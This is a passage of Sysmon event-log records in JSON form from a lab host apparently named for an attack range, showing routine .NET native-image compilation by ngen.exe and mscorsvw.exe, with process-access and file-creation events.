05:59:17.481","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B5-5F25-0000-0010E51F1000}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:18.449\r\nProcessGuid: {A837DB8D-04B5-5F25-0000-0010E51F1000}\r\nProcessId: 4612\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1204-0\\System.Data.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 05:59:18.449","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:18.449","ProcessGuid":"{A837DB8D-04B5-5F25-0000-0010E51F1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1204-0\\System.Data.Entity.Design.dll","CreationUtcTime":"2020-08-01 05:59:18.449","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-001030251000}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-001030251000}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-001030251000}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-001030251000}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-001030251000}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-001030251000}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.590\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-001062D10E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.590","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-001062D10E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.590\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-001062D10E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.590","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-001062D10E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:18.606\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-0010EA281000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:18.606","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B6-5F25-0000-0010EA281000}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:20.418\r\nProcessGuid: {A837DB8D-04B6-5F25-0000-0010EA281000}\r\nProcessId: 2672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Data.Linq.dll\r\nCreationUtcTime: 2020-08-01 05:59:20.418","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:20.418","ProcessGuid":"{A837DB8D-04B6-5F25-0000-0010EA281000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Data.Linq.dll","CreationUtcTime":"2020-08-01 05:59:20.418","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.481\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B8-5F25-0000-00105D2D1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 